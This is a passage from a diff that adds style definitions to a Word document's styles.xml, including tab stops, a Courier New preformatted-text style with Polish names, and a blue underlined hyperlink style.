+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="pl-PL" w:eastAsia="pl-PL"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTML-wstpniesformatowanyZnak">
+    <w:name w:val="HTML - wstępnie sformatowany Znak"/>
+    <w:basedOn w:val="Domylnaczcionkaakapitu"/>
+    <w:link w:val="HTML-wstpniesformatowany"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00850DE7"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="pl-PL" w:eastAsia="pl-PL"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink2">
+    <w:name w:val="Hyperlink.2"/>
+    <w:basedOn w:val="Hipercze"/>
+    <w:rsid w:val="002E3BCC"/>
+    <w:rPr>
+      <w:outline w:val="0"/>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single" w:color="0000FF"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
